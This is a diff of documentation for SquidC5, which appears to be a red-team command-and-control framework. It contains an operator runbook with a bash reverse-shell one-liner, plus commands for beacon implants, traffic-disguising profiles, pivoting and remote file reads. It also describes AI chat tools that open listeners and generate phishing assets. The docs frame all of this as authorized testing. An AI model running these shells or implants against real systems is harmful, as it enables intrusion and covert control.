+| Deployment | [deployment.md](deployment.md) |
+| Full CLI | [AGENTS.md](../AGENTS.md) |
+| Docs index | [README.md](README.md) |
+
+---
+
 ## Prerequisites
+
+### Goal
+
+Install CLI tooling on the operator workstation.
+
+### Prerequisites
+
+- Python 3.11+
+- Network path to the teamserver
+
+### Steps
 
 ```bash
 cd /path/to/squidc5
@@ -12,18 +34,79 @@ python3 -m venv .venv && source .venv/bin/activate
 pip install -e .
 ```
 
-## Connect CLI to a server
+Or use release binaries: `sc5-linux-x64` from [GitHub Releases](https://github.com/SquidSec/SquidC5/releases/latest).
+
+### Verify
 
 ```bash
-# Token comes from server bootstrap file — never commit it
-sc5 login --url http://<HOST>:8443 --token sc5_...
+sc5 --help
+```
+
+### See also
+
+- [User guide — CLI reference](user-guide.md#cli-reference)
+- [Root README — Quick start](../README.md#quick-start-local)
+
+---
+
+## Connect CLI to a server
+
+### Goal
+
+Authenticate `sc5` against a running teamserver.
+
+### Prerequisites
+
+- Bootstrap or operator token (`data/admin_token.txt` on first start — never commit)
+- Teamserver URL (HTTPS by default)
+
+### Steps
+
+```bash
+sc5 login --url https://<HOST>:8443 --token sc5_... --insecure
 sc5 health
 sc5 whoami
 ```
 
-Config stored at `~/.config/squidc5/config.json` (mode 0600).
+Config stored at `~/.config/squidc5/config.json` (mode 0600).  
+Use `--insecure` only for self-signed lab certs.
+
+### Verify
+
+```bash
+sc5 health
+# expect status ok
+sc5 whoami
+# expect scopes list
+```
+
+### If it fails
+
+| Symptom | Check |
+|---------|--------|
+| TLS errors | `--insecure` or install CA; see [TLS](deployment.md#tls-https-default-on-new-instances) |
+| 401 | Token wrong / revoked |
+| Connection refused | Host/port, firewall, process up |
+
+### See also
+
+- [User guide — Connection](user-guide.md#connection)
+- [Deployment — TLS](deployment.md#tls-https-default-on-new-instances)
+
+---
 
 ## Reverse shell
+
+### Goal
+
+Capture a verified reverse shell and run a command.
+
+### Prerequisites
+
+- CLI logged in with `listeners:write`, `sessions:read`, `shell:interact`
+- Target authorized under ROE; target can reach `HOST:PORT`
+
+### Steps
 
 ```bash
 sc5 listeners create rev-443 443 --kind reverse_shell
@@ -40,21 +123,47 @@ bash -c 'bash -i >& /dev/tcp/<HOST>/443 0>&1'
 Operate:
 
 ```bash
-sc5 sessions list
+sc5 sessions list --shells
 sc5 shell <session_id> "whoami"
 sc5 events
 ```
 
-### If reverse shell does not register
+### Verify
+
+- `sc5 listeners list` shows `running`
+- Session `kind: reverse_shell` with `verified: true`
+- `sc5 shell … "whoami"` returns remote output
+
+### If reverse shell fails
 
 1. Listener `status` must be `running` (`sc5 listeners list`).
 2. With Docker **bridge** networking, host must publish the port (`ports: ["443:443"]`).
-3. With current compose **host** networking, process binds host ports directly.
+3. With compose **host** networking, process binds host ports directly.
 4. Ports &lt; 1024 need host sysctl: `net.ipv4.ip_unprivileged_port_start=0` (container is non-root).
-5. Host firewall must allow the port (`ufw allow 443/tcp`).
+5. Host firewall must allow the port.
 6. Target must reach `<HOST>:<port>` (egress/NAT).
+7. Flood of rejects on 443 is normal (scanners); false-shell filter drops noise.
+
+### See also
+
+- [User guide — Shell](user-guide.md#shell)
+- [User guide — Listeners](user-guide.md#listeners)
+- [Deployment — Privileged ports](deployment.md#privileged-ports)
+
+---
 
 ## HTTP beacon
+
+### Goal
+
+Task an HTTP beacon implant.
+
+### Prerequisites
+
+- HTTP or HTTPS listener running (or beacons hitting API port per profile)
+- Prefer active [C2 profile](#malleable-http-profiles) for HTTP shape
+
+### Steps
 
 ```bash
 sc5 payloads generate http_beacon_python <HOST> 8443 --raw
@@ -65,7 +174,36 @@ sc5 tasks list --session <session_id>
 sc5 tasks get <task_id>
 ```
 
+### Verify
+
+- Session `kind: beacon` appears
+- Task moves to completed with output after check-in
+
+### If it fails
+
+| Symptom | Check |
+|---------|--------|
+| No session | Wrong host/port/scheme; profile URI mismatch |
+| Task stuck pending | Beacon sleep; listener down; profile change without regen |
+
+### See also
+
+- [User guide — Tasks](user-guide.md#tasks)
+- [User guide — C2 profiles](user-guide.md#c2-profiles-profiles)
+
+---
+
 ## Tokens
+
+### Goal
+
+Mint least-privilege tokens for operators or MCP.
+
+### Prerequisites
+
+- Admin or `tokens:manage` scope
+
+### Steps
 
 ```bash
 sc5 tokens create ops \
@@ -76,20 +214,43 @@ sc5 tokens create ext-ai \
   --mcp-tools "list_sessions,get_session,list_tasks,create_task,get_metrics"
 ```
 
+Raw `sc5_…` is shown **once** — store in a password manager.
+
+### Verify
+
+```bash
+sc5 tokens list
+sc5 login --url … --token <new> --insecure && sc5 whoami
+```
+
+### See also
+
+- [User guide — Tokens](user-guide.md#tokens)
+- [User guide — MCP tools](user-guide.md#mcp-tools)
+
+---
+
 ## INKO (Intelligent Neural Kinetic Operator)
 
-**INKO** is the ops neural operator (chat + railed C5 tools).
+### Goal
 
-Ops UI:
+Use INKO chat to inspect and act on the live teamserver under rails.
+
+### Prerequisites
+
+- Token with `ai:use` or `admin`
+- Optional: LLM configured ([User guide — LLM](user-guide.md#llm-connections))
+
+### Steps
+
+**Ops UI:**
 
 1. Configure LLM under **Admin** (or `sc5 llm add …`) — optional; offline intents still work.
-2. Top-bar **INKO** → right flyout (full screen on mobile). Nav **INKO** page for full workspace.
-3. Needs `ai:use` or `admin`. Enter sends; Shift+Enter newline. Escape / backdrop closes flyout.
+2. Top-bar **◈ INKO** → right flyout (full screen on mobile). Nav **INKO** for full workspace + model switcher.
+3. Pick connection and model. Enter sends; Shift+Enter newline. Escape / backdrop closes flyout.
 4. Chat history is browser-local; tool calls are audited server-side (scopes + policy + HITL).
 
-Example asks: *“list sessions”*, *“setup reverse shell listener on 4444”*, *“show recent events”*.
-
-Structured capabilities (CLI / API — not the free-form chat box):
+**CLI capabilities** (structured, not free-form chat):
 
 ```bash
 sc5 ai recon_assist --data "windows domain host"
@@ -101,28 +262,105 @@ sc5 llm add grok-prod grok-3 --provider xai --base-url https://api.x.ai/v1 --api
 
 REST: `POST /api/v1/ai/chat`, `POST /api/v1/ai/run`, `GET /api/v1/ai/tools`, `GET /api/v1/ai/status`.
 
+Example asks: *“list sessions”*, *“setup reverse shell listener on 4444”*, *“show recent events”*, *“save this payload as an artifact”*.
+
+### Verify
+
+- Flyout opens; offline or LLM reply returns
+- Audit shows `ai.admin.chat` / tool events when tools run
+
+### If it fails
+
+| Symptom | Check |
+|---------|--------|
+| 403 | Missing `ai:use` |
+| Offline-only | No LLM configured |
+| Tool denied | Scope or HITL queue |
+
+### See also
+
+- [User guide — INKO](user-guide.md#inko-intelligent-neural-kinetic-operator)
+- [User guide — LLM connections](user-guide.md#llm-connections)
+
+---
+
 ## Observability
+
+### Goal
+
+Read metrics, audit, and live events.
+
+### Prerequisites
+
+- `metrics:read` / `audit:read` as needed
+
+### Steps
 
 ```bash
 sc5 metrics
 sc5 audit --limit 50
+sc5 audit-verify --limit 500
 sc5 events
 sc5 policy get
 ```
 
+Ops → **Observe**.
+
+### Verify
+
+- Metrics JSON returns counters
+- `audit-verify` reports chain OK (or flags breaks)
+
+### See also
+
+- [User guide — Observability](user-guide.md#observability)
+
+---
+
 ## Interactive mode
+
+### Goal
+
+Use the REPL for multi-command sessions.
+
+### Prerequisites
+
+- CLI configured (`sc5 login`)
+
+### Steps
 
 ```bash
 sc5 repl
 ```
 
+### Verify
+
+- Prompt accepts `health`, `sessions list`, etc.
+
+### See also
+
+- [User guide — CLI reference](user-guide.md#cli-reference)
+
+---
+
 ## Malleable HTTP profiles
+
+### Goal
+
+Activate a profile and generate a matching HTTP beacon.
+
+### Prerequisites
+
+- `profiles:read` / `profiles:write` as needed
+- HTTP/HTTPS listener up
+
+### Steps
 
 ```bash
 sc5 profiles list
 sc5 profiles activate prof_amazon_cdn
 sc5 payloads generate http_beacon_python <HOST> 8443 --profile prof_amazon_cdn --raw
-# Implant posts to profile URIs (e.g. /v1/telemetry) with wrapped body
+# Implant posts to profile URIs with wrapped body
 ```
 
 HTTPS via redirector:
@@ -132,9 +370,40 @@ sc5 payloads generate http_beacon_python <CDN_HOST> 443 --scheme https --raw
 sc5 redirector --server-name cdn.example --uris /v1/telemetry,/api/v1/implant/beacon --raw
 ```
 
+Ops → **Profiles** → activate → **Payloads** → generate.
+
 Lab cert helper (host with certbot): `scripts/acme_lab_renew.sh` with `DOMAINS=... EMAIL=...`.
 
+### Verify
+
+- Beacon session appears after execution
+- Tasks complete under the active profile
+
+### If it fails
+
+| Mistake | Result |
+|---------|--------|
+| Profile B active, implant built for A | No check-in |
+| Redirector paths ≠ profile | Edge 404 |
+
+### See also
+
+- [User guide — C2 profiles](user-guide.md#c2-profiles-profiles)
+- [User guide — Redirector](user-guide.md#redirector-and-certificates)
+
+---
+
 ## DNS C2
+
+### Goal
+
+Run a DNS beacon against a DNS listener.
+
+### Prerequisites
+
+- DNS listener + zone; network path for DNS queries
+
+### Steps
 
 ```bash
 sc5 listeners create dns1 5353 --kind dns --zone c2.lab.invalid --host 0.0.0.0
@@ -142,10 +411,31 @@ sc5 listeners start <id>
 sc5 payloads generate dns_beacon_python <DNS_HOST> 5353 --zone c2.lab.invalid --raw
 ```
 
+### Verify
+
+- Session appears; tasks complete after DNS check-ins
+
+### See also
+
+- [User guide — Listeners](user-guide.md#listeners)
+- [OAST Collaborator](#oast-collaborator-http-dns-smtp) (related DNS path)
+
+---
+
 ## OAST Collaborator (HTTP / DNS / SMTP)
 
+### Goal
+
+Mint OAST tokens and poll out-of-band hits.
+
+### Prerequisites
+
+- OAST zone and listeners configured — [Deployment — OAST](deployment.md#oast-collaborator-dns-http-smtp)
+- CLI with access to teamserver
+
+### Steps
+
 ```bash
-# self-signed teamserver
 sc5 --insecure login --url https://TEAM:8443 --token sc5_...
 
 sc5 --insecure oast token create --note "sqli-oob"
@@ -157,20 +447,74 @@ sc5 --insecure oast hits --token <TOKEN> --protocol dns
 ```
 
 DNS listener config: `--zone oast.example.com --dns-mode both` (or `oast` / `beacon`).  
-SMTP is log-only (feature `smtp_oast`, default off). See `docs/deployment.md` § OAST.
+SMTP is log-only (feature `smtp_oast`, default off).
 
-Point lab zone NS/records at the C2 host (authorized lab only).
+Point lab zone NS/records at the C2 host (**authorized lab only**; use *your* zone/IP — examples in deployment are illustrative).
+
+### Verify
+
+```bash
+# after triggering callback from authorized test
+sc5 --insecure oast hits --token <TOKEN>
+# expect protocol rows
+```
+
+### If it fails
+
+| Symptom | Check |
+|---------|--------|
+| No DNS hits | NS delegation, firewall 53/udp+tcp |
+| No SMTP | Feature flag; provider blocks 25 — try 2525 |
+| No HTTP | Listener on 80 running; public host correct |
+
+### See also
+
+- [User guide — OAST](user-guide.md#oast-collaborator)
+- [Deployment — OAST](deployment.md#oast-collaborator-dns-http-smtp)
+
+---
 
 ## WebSocket C2
+
+### Goal
+
+Generate and run a WebSocket beacon.
+
+### Prerequisites
+
+- Server WS path available; client has `websocket-client` if using Python template
+
+### Steps
 
 ```bash
 sc5 payloads generate ws_beacon_python <HOST> 8443 --raw
 # optional TLS termination: --scheme wss and proxy wss to the server
 ```
 
-Server path: `/ws/v1/beacon` (or WS profile path). Client needs `websocket-client`.
+Server path: `/ws/v1/beacon` (or WS profile path).
+
+### Verify
+
+- Beacon session appears; tasks complete
+
+### See also
+
+- [User guide — Payloads](user-guide.md#payloads-and-implants)
+
+---
 
 ## Implants
+
+### Goal
+
+Build or generate implant families, including native sc5beacon.
+
+### Prerequisites
+
+- `payloads:generate` / implant scopes
+- For native: Go toolchain or CI artifact; teamserver PSK
+
+### Steps
 
 ```bash
 sc5 implants families
@@ -193,7 +537,30 @@ export SC5_PSK="$(cat data/implant_psk.txt)"   # from teamserver
 
 Server must have `SQUIDC5_IMPLANT_REQUIRE_AUTH=true` (default) and matching PSK.
 
-### SOCKS pivot
+### Verify
+
+- Session appears as authenticated beacon
+- Optional: save build under Ops → **Artifacts**
+
+### See also
+
+- [User guide — Payloads and implants](user-guide.md#payloads-and-implants)
+- [User guide — Artifacts](user-guide.md#artifacts)
+
+---
+
+## SOCKS pivot
+
+### Goal
+
+Open a SOCKS5 pivot through an implant session.
+
+### Prerequisites
+
+- Live beacon session; appropriate scopes
+- `SQUIDC5_PUBLIC_HOST` set when using reverse-dial from remote implants
+
+### Steps
 
 ```bash
 # Implant reverse-dial (default): needs live beacon session
@@ -202,11 +569,33 @@ curl -sk -X POST -H "Authorization: Bearer $TOK" -H "Content-Type: application/j
   https://C2:8443/api/v1/pivot/socks
 # Point proxy tool at returned listen_port; implant handles socks:connect tasks
 
-# Direct mode: C2 dials targets itself (lab)
+# Direct mode: C2 dials targets itself (lab only)
 # mode=direct
 ```
 
-### File ops
+Ops → **Post-Ex** with session selected.
+
+### Verify
+
+- API returns listen host/port; proxy tool connects
+
+### See also
+
+- [User guide — Post-Ex](user-guide.md#post-ex)
+
+---
+
+## File ops
+
+### Goal
+
+List/read/write/delete files on a session.
+
+### Prerequisites
+
+- Session claimed if collab locks apply; scopes for file ops
+
+### Steps
 
 ```bash
 # POST /api/v1/files/op
@@ -214,13 +603,55 @@ curl -sk -X POST -H "Authorization: Bearer $TOK" -H "Content-Type: application/j
 # {"session_id":"...","op":"read","path":"/etc/hosts","offset":0,"length":1024}
 ```
 
-### Audit integrity
+Ops → **Post-Ex** / context rail.
+
+### Verify
+
+- JSON result with listing or chunk data
+
+### See also
+
+- [User guide — Post-Ex](user-guide.md#post-ex)
+
+---
+
+## Audit integrity
+
+### Goal
+
+Verify the audit hash chain.
+
+### Prerequisites
+
+- `audit:read`
+
+### Steps
 
 ```bash
 sc5 audit-verify --limit 500
 ```
 
-## Teams / collab
+### Verify
+
+- Exit success / OK summary; investigate any break immediately
+
+### See also
+
+- [User guide — Observability](user-guide.md#observability)
+
+---
+
+## Teams and collab
+
+### Goal
+
+Coordinate multiple operators on shared sessions.
+
+### Prerequisites
+
+- Feature `collab_teams` as required; collab scopes
+
+### Steps
 
 ```bash
 sc5 teams create red-cell
@@ -255,15 +686,67 @@ curl -sk -H "Authorization: Bearer $TOK" -H "Content-Type: application/json" \
 curl -sk -H "Authorization: Bearer $TOK" "$URL/api/v1/audit/me?limit=50"
 ```
 
+Ops → **Collab**.
+
+### Verify
+
+- Second operator cannot shell without claim (non-admin)
+- Handoff transfers claim; spectator is read-only
+
+### See also
+
+- [User guide — Multi-operator collab](user-guide.md#multi-operator-collab)
+
+---
+
 ## AI chains
+
+### Goal
+
+Run a short allow-listed playbook chain (not open-ended agents).
+
+### Prerequisites
+
+- AI scopes; LLM if chain requires model
+
+### Steps
 
 ```bash
 sc5 playbooks
 sc5 chain recon_then_classify --data "windows domain lab"
 ```
 
+### Verify
+
+- Chain completes with audited steps
+
+### See also
+
+- [User guide — INKO](user-guide.md#inko-intelligent-neural-kinetic-operator)
+- [User guide — Policy](user-guide.md#policy)
+
+---
+
 ## Report export
+
+### Goal
+
+Export an engagement report markdown.
+
+### Prerequisites
+
+- Metrics/audit scopes
+
+### Steps
 
 ```bash
 sc5 report --raw > engagement-report.md
 ```
+
+### Verify
+
+- File non-empty; review before sharing (authorized channels only)
+
+### See also
+
+- [User guide — Timeline and reports](user-guide.md#timeline-and-reports)

--- a/docs/prod-readiness-plan.md
+++ b/docs/prod-readiness-plan.md
@@ -4,6 +4,16 @@
 **Repo:** `https://github.com/SquidSec/SquidC5` (default branch: `master`)  
 **Status:** Alpha 0.1.x → target 1.0.0 after Phase C minimum; Phase D hardens OSS excellence.
 
+| Related | Link |
+|---------|------|
+| Five-star pack status | [roadmap-five-star.md](roadmap-five-star.md) (many packs already **Landed** — check before redoing work) |
+| Roadmap 2026–2027 | [roadmap-2026-2027.md](roadmap-2026-2027.md) |
+| Deployment | [deployment.md](deployment.md) |
+| Threat model | [threat-model.md](threat-model.md) |
+| Docs index | [README.md](README.md) |
+
+> **Engineering plan** (not operator how-to). Prefer [roadmap-five-star.md](roadmap-five-star.md) for current pack status.
+
 ## Mandatory git cycle (every change)
 
 From SquidSec `AGENTS.md` + `knowledge-base/MEMORY.md` and SquidC5 `AGENTS.md`:

--- a/docs/roadmap-2026-2027.md
+++ b/docs/roadmap-2026-2027.md
@@ -4,6 +4,14 @@
 
 **Philosophy (non-negotiable):** secure by default · agents on rails · audit everything · OPSEC first · operator ergonomics · AI leverage without open-ended autonomy.
 
+| Related | Link |
+|---------|------|
+| Five-star packs | [roadmap-five-star.md](roadmap-five-star.md) |
+| Vision | [squidc5-vision.md](squidc5-vision.md) |
+| Prod readiness | [prod-readiness-plan.md](prod-readiness-plan.md) |
+| Docs index | [README.md](README.md) |
+| Deploy policy | [deployment.md#production-binary-only-deploy](deployment.md#production-binary-only-deploy) |
+
 **Delivery pipeline (prod):**
 
 ```text

--- a/docs/roadmap-five-star.md
+++ b/docs/roadmap-five-star.md
@@ -4,6 +4,12 @@ Goal: ★★★★★ across implants, traffic, post-ex, multi-player, AI, gover
 
 **Process:** feature branch → unit tests → PR → CI + SquidGate green → merge `master` → deploy **Release binary** to prod → repeat.
 
+| Related | Link |
+|---------|------|
+| Long-range roadmap | [roadmap-2026-2027.md](roadmap-2026-2027.md) |
+| Prod readiness checklist | [prod-readiness-plan.md](prod-readiness-plan.md) |
+| Docs index | [README.md](README.md) |
+
 ## Pack status (living)
 
 | Pack | Focus | Status |
@@ -59,7 +65,10 @@ Token grant subset · policy admin-only · MCP=REST gates · HITL single-use · 
 
 ## Links
 
-- [User guide](user-guide.md)  
-- [Deployment](deployment.md)  
-- [Native beacon](../agents/sc5beacon/README.md)  
-- [README](../README.md)  
+| Doc | Link |
+|-----|------|
+| User guide | [user-guide.md](user-guide.md) |
+| Deployment | [deployment.md](deployment.md) |
+| Native beacon | [../agents/sc5beacon/README.md](../agents/sc5beacon/README.md) |
+| Root README | [../README.md](../README.md) |
+| Vision | [squidc5-vision.md](squidc5-vision.md) |

--- a/docs/squidc5-vision.md
+++ b/docs/squidc5-vision.md
@@ -1,18 +1,50 @@
 # SquidC5 Vision & System Specification
 
-**Version:** 0.1.0  
+**Version:** 0.1.x  
 **Status:** Active development — **military-grade, security-first C5**  
 **Purpose:** Authorized penetration testing, red team, and defensive security operations only  
-**C5:** Command • Control • Cognitive • Collaborative • Coordination  
-**Roadmap:** See `docs/roadmap-2026-2027.md` (malleable profiles → implants → evasion → multi-op → AI → plugins → observability → deploy → testing → community)
+**C5:** Command · Control · Cognitive · Collaborative · Coordination  
+
+| Related | Link |
+|---------|------|
+| Roadmap | [roadmap-2026-2027.md](roadmap-2026-2027.md) |
+| User guide | [user-guide.md](user-guide.md) |
+| Threat model | [threat-model.md](threat-model.md) |
+| Docs index | [README.md](README.md) |
+| Agent memory | [../AGENTS.md](../AGENTS.md) |
+
+---
 
 ## Overview
 
+### What
+
 **C5** expands to **Command, Control, Cognitive, Collaborative, Coordination** — the five pillars SquidC5 is built around (tasking, authority rails, AI assist, multi-operator work, and engagement orchestration).
 
-SquidC5 is a professional, lightweight, **military-grade**, security-first, AI-native C5 / command-and-control framework under active development. It is designed open-source-ready from the first commit, with strong emphasis on **secure defaults**, AI restriction, determinism, auditability, and low resource usage.
+SquidC5 is a professional, lightweight, **military-grade**, security-first, AI-native C5 / command-and-control framework. It is designed open-source-ready, with strong emphasis on **secure defaults**, AI restriction, determinism, auditability, and low resource usage.
 
-Hardened posture includes: no public API documentation surface, scoped tokens, server-gated admin UI, feature flags, false-shell filtering, shell exec verification, and dual AI controls (restricted MCP + sandboxed Admin AI / INKO).
+### Why
+
+Hardened posture includes: no public API documentation surface, scoped tokens, server-gated admin UI, feature flags, false-shell filtering, shell exec verification, dual AI controls (restricted MCP + sandboxed Admin AI / INKO), malleable profiles, OAST, and binary-only production deploys.
+
+### How (architecture sketch)
+
+```text
+Operator (sc5 / /ops / INKO)
+    → API (scopes + policy + audit)
+        → Sessions · Tasks · Listeners · Payloads · Profiles · Assets
+        → INKO chat tools + Admin AI capabilities
+        → MCP (allow-listed, off by default)
+        → SQLite data/
+Implants / reverse shells / OAST callbacks → Listeners → Sessions
+```
+
+### See also
+
+- [User guide — Overview](user-guide.md#overview)
+- [Threat model](threat-model.md)
+
+---
 
 ## Dual AI Architecture
 
@@ -26,26 +58,31 @@ External AI agents connect using scoped API tokens and interact via the MCP-comp
 - Prefer single-tool deterministic calls over autonomous chaining
 - Policy engine enforces `max_chain_length` (default 1)
 - All tool calls are audited
+- Feature often **off by default**
 
 ### 2. Server-Side Admin AI / INKO (Internal Intelligence Layer)
 
 **INKO** (Intelligent Neural Kinetic Operator) is the operator-facing neural chat surface on top of the sandboxed Admin AI stack.
 
-Administrators configure BYO LLM connections (Ops **Admin** UI or CLI). **INKO** exposes multi-turn chat with railed C5 tools (`POST /api/v1/ai/chat`). The Admin AI also supports limited structured capabilities (`POST /api/v1/ai/run`):
+Administrators configure BYO LLM connections (Ops **Admin** UI or CLI). **INKO** exposes multi-turn chat with railed C5 tools (`POST /api/v1/ai/chat`), optional per-turn **model** override, and a system prompt that documents platform purpose and workflows. The Admin AI also supports limited structured capabilities (`POST /api/v1/ai/run`):
 
-- `payload_template`
-- `phishing_asset`
-- `doc_generate`
-- `shell_classify`
-- `recon_assist`
+- `payload_template`, `phishing_asset`, `doc_generate`, `shell_classify`, `recon_assist`, …
+- Chat tools: sessions, listeners, tasks, payloads, profiles, assets, metrics, shell (HITL when required), …
 
 **Shielding:**
 
-- Untrusted data sanitized and length-capped
+- Untrusted data sanitized and length-capped (`sanitize_untrusted`)
 - Injection markers filtered
-- Fixed system prompts; user data in isolation blocks
+- Fixed system prompts; tool results re-sanitized before model re-entry
 - Offline deterministic fallback when no LLM configured
-- Sandbox enforced by policy
+- Sandbox enforced by policy; bounded tool rounds (no open agent loops)
+
+### See also
+
+- [User guide — INKO](user-guide.md#inko-intelligent-neural-kinetic-operator)
+- [User guide — MCP tools](user-guide.md#mcp-tools)
+
+---
 
 ## Authentication & Tokens
 
@@ -53,20 +90,48 @@ Administrators configure BYO LLM connections (Ops **Admin** UI or CLI). **INKO**
 - Admin token bootstrapped on first start (written once to `data/admin_token.txt`)
 - Fine-grained scopes; MCP tools separately allow-listed
 - Full audit of create/revoke/use
+- Admin UI JS served only after server-side admin scope check
+
+### See also
+
+- [User guide — Tokens](user-guide.md#tokens)
+- [User guide — Security model](user-guide.md#security-model)
+
+---
 
 ## Core C2 Engine
 
-- **Listeners:** `http`, `tcp`, `reverse_shell` — any port (no 80/443 requirement)
-- **Sessions:** beacons and reverse shells as first-class objects
-- **Tasking:** structured pending → running → completed
-- **Payloads:** deterministic templates only
-- **Files / phone operators:** scoped token model ready
+| Subsystem | Behavior |
+|-----------|----------|
+| **Listeners** | `http`, `https`, `tcp`, `reverse_shell`, `dns`, `smtp` — any port (no 80/443 requirement) |
+| **Sessions** | Beacons and reverse shells as first-class objects; verify + reap |
+| **Tasking** | Structured pending → running → completed |
+| **Payloads** | Deterministic templates + custom templates + implant factory |
+| **Profiles** | Malleable HTTP(S) surface; active profile contract |
+| **Artifacts** | Saved payloads/templates/profiles for reuse |
+| **OAST** | DNS/HTTP/SMTP collaborator hits |
+| **Files / SOCKS** | Scoped post-ex on sessions |
+| **Collab** | Claim, handoff, spectator, presence, team chat |
+
+### See also
+
+- [User guide](user-guide.md)
+- [Roadmap 2026–2027](roadmap-2026-2027.md)
+
+---
 
 ## Observability
 
 - SQLite-backed metrics counters
-- Immutable audit log
-- SSE event stream at `/api/v1/events/stream`
+- Immutable audit log with hash-chain verify (`sc5 audit-verify`)
+- SSE / polled event stream for ops dock
+- Timeline and engagement report export
+
+### See also
+
+- [User guide — Observability](user-guide.md#observability)
+
+---
 
 ## Policy Engine
 
@@ -78,22 +143,37 @@ Governs humans, external AI, and admin AI:
 - external AI determinism rules
 - admin AI sandbox rules
 
+### See also
+
+- [User guide — Policy](user-guide.md#policy)
+
+---
+
 ## Operator CLI
 
-`sc5` / `squidc5-cli` (`src/squidc5/cli.py`) is the primary local harness for remote C2 control. It stores non-secret path config under `~/.config/squidc5/` (token local-only). Full command surface is documented in `AGENTS.md` and `docs/operator-runbook.md`.
+`sc5` / `squidc5-cli` (`src/squidc5/cli.py`) is the primary local harness for remote C2 control. It stores config under `~/.config/squidc5/` (token local-only).
+
+**Full command surface:** [AGENTS.md](../AGENTS.md)  
+**Day-2 procedures:** [operator-runbook.md](operator-runbook.md)  
+**Feature reference:** [user-guide.md#cli-reference](user-guide.md#cli-reference)
+
+---
 
 ## Technology Stack
 
 | Layer | Choice |
 |-------|--------|
 | Language | Python 3.11+ |
-| API | FastAPI + Uvicorn |
+| API | FastAPI + Uvicorn (HTTPS default) |
 | Operator CLI | `sc5` (httpx) |
 | MCP | HTTP MCP-lite (allow-listed tools) |
 | DB | SQLite (aiosqlite) |
-| Deploy | Docker host-network (primary), standalone binaries planned |
+| Deploy | **Prod:** main-CI standalone binary + systemd · **Lab:** Docker host-network |
+| Native implant | Go `agents/sc5beacon` |
 | Tests | pytest |
-| CI | GitHub Actions |
+| CI | GitHub Actions + SquidGate |
+
+---
 
 ## Design Goals
 
@@ -102,7 +182,15 @@ Governs humans, external AI, and admin AI:
 3. Port-flexible listeners
 4. Security and AI restriction first
 5. Open-source readiness (README, CI, LICENSE, AGENTS.md, vision doc)
+6. Binary-only production path after merge to master
+
+---
 
 ## Responsible Use
 
 SquidC5 is intended solely for authorized security testing. Unauthorized access to computer systems is illegal. Operators are responsible for obtaining proper authorization before use.
+
+### See also
+
+- [SECURITY.md](../SECURITY.md)
+- [User guide — Authorized use](user-guide.md#authorized-use-reminder)

--- a/docs/threat-model.md
+++ b/docs/threat-model.md
@@ -89,6 +89,11 @@
 
 ## Related
 
-- [SECURITY.md](../SECURITY.md)  
-- [deployment.md](deployment.md)  
-- [prod-readiness-plan.md](prod-readiness-plan.md)  
+| Doc | Link |
+|-----|------|
+| Disclosure | [SECURITY.md](../SECURITY.md) |
+| Deployment | [deployment.md](deployment.md) |
+| Prod readiness | [prod-readiness-plan.md](prod-readiness-plan.md) |
+| Vision | [squidc5-vision.md](squidc5-vision.md) |
+| User guide — Security model | [user-guide.md#security-model](user-guide.md#security-model) |
+| Docs index | [README.md](README.md) |

--- a/docs/user-guide.md
+++ b/docs/user-guide.md
@@ -1,93 +1,138 @@
 # SquidC5 User Guide
 
-**Command • Control • Cognitive • Collaborative • Coordination**
+**Command · Control · Cognitive · Collaborative · Coordination**
 
 **Authorized red team / penetration testing only.**  
 This guide lives in the GitHub repository. It is **not** served by the C2 process (`/docs` on the server stays disabled).
 
 **Source of truth:** [docs/user-guide.md](https://github.com/SquidSec/SquidC5/blob/master/docs/user-guide.md) on branch `master`.
+
+| Related | Purpose |
+|---------|---------|
+| [Docs index](README.md) | Catalog + Diátaxis map |
+| [Operator runbook](operator-runbook.md) | Day-2 procedures |
+| [Deployment](deployment.md) | Lab Docker + binary prod |
+| [Vision](squidc5-vision.md) | Architecture |
+| [Threat model](threat-model.md) | Trust boundaries |
+| [Roadmap 2026–2027](roadmap-2026-2027.md) | Planned work |
+| [AGENTS.md](../AGENTS.md) | Full CLI surface |
+
 ### What C5 stands for
 
 | Pillar | In SquidC5 |
 |--------|------------|
 | **Command** | Task shells and beacons; issue operator intent |
 | **Control** | Auth scopes, policy engine, listeners, feature kill-switches |
-| **Cognitive** | INKO (Intelligent Neural Kinetic Operator) + Admin AI rails + external MCP tools (allow-listed) |
+| **Cognitive** | INKO + Admin AI rails + external MCP tools (allow-listed) |
 | **Collaborative** | Teams, chat, handoff, shared ops console |
 | **Coordination** | C2 profiles, task queues, metrics, timeline, reports |
 
-| Related docs | Purpose |
-|--------------|---------|
-| [Operator runbook](operator-runbook.md) | Short how-to procedures |
-| [Deployment](deployment.md) | Docker lab + binary prod |
-| [Vision](squidc5-vision.md) | Product / security architecture |
-| [Threat model](threat-model.md) | Trust boundaries |
-| [Roadmap](roadmap-2026-2027.md) | Planned work |
-
 ### Concepts primer (Grokpedia)
 
-Background reading for operators who want the *security-industry* meaning of a term, not just SquidC5 UI steps. These open **[Grokpedia](https://grok.com/pedia)** concept pages (external). SquidC5 still only runs under **authorized** ROE.
+Background reading for industry meaning of terms (external). SquidC5 still only runs under **authorized** ROE.
 
 | Concept | Why it matters here | Grokpedia |
 |---------|---------------------|-----------|
-| Command and control (C2) | Overall role of SquidC5 as a team server | [command-and-control](https://grok.com/pedia/command-and-control) · [c2](https://grok.com/pedia/c2) |
+| Command and control (C2) | Team server role | [command-and-control](https://grok.com/pedia/command-and-control) |
 | Red team | Authorized adversarial simulation | [red-team](https://grok.com/pedia/red-team) |
 | Penetration testing | Scoped offensive assessment | [penetration-testing](https://grok.com/pedia/penetration-testing) |
-| Payload | Delivered code/stage that runs on a target | [payload](https://grok.com/pedia/payload) |
-| Implant | Persistent or resident agent on a target | [implant](https://grok.com/pedia/implant) |
-| Beacon | Periodic check-in style implant | [beacon](https://grok.com/pedia/beacon) |
-| Reverse shell | Target connects *out* to operator listener | [reverse-shell](https://grok.com/pedia/reverse-shell) |
+| Payload | Delivered code/stage on a target | [payload](https://grok.com/pedia/payload) |
+| Implant | Resident agent on a target | [implant](https://grok.com/pedia/implant) |
+| Beacon | Periodic check-in implant | [beacon](https://grok.com/pedia/beacon) |
+| Reverse shell | Target connects out to listener | [reverse-shell](https://grok.com/pedia/reverse-shell) |
 | DNS tunneling | Covert channel over DNS | [dns-tunneling](https://grok.com/pedia/dns-tunneling) |
-| WebSocket | Bidirectional web channel (WS beacons) | [websocket](https://grok.com/pedia/websocket) |
-| Phishing | Credential/payload delivery vector (authorized only) | [phishing](https://grok.com/pedia/phishing) |
-| Model Context Protocol | External tool bridge pattern (MCP panel) | [model-context-protocol](https://grok.com/pedia/model-context-protocol) |
